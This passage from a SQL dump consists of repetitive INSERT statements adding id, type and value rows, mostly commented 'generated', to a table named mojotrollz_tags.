(5122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5125, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5126, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5127, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5128, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5129, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5130, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5130, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5132, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5132, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5133, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5133, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5134, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5134, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5134, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5135, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5135, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5135, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5137, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5138, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5139, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5139, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5140, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5141, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5142, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5143, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5143, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5144, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5145, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5146, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5147, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5148, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5148, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5149, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5150, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5151, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5152, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5153, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5154, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5155, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5156, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5157, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5157, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5158, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5159, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5160, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5161, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5162, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5163, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5164, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5165, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5166, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5167, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5169, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5170, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5171, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5172, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5173, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5174, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5175, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5178, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5185, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5186, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5186, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5190, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5190, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5190, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5190, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5193, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5198, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5198, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5198, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5200, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5224, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5224, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5225, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5225, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5226, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5226, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5226, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5228, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5228, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5228, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5229, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5232, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5235, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5235, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5237, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5238, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5239, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5239, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5240, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5241, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5243, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5243, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5244, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5245, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5246, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5247, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5249, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5251, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5253, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5254, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5255, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5256, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5256, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5256, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5258, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5259, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5259, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5259, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5260, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5261, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5261, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5262, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5262, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5263, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5263, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5267, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5267, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5267, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5268, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5269, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5269, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5270, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5270, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5270, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5271, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5271, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5271, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5272, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5273, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5273, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5273, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 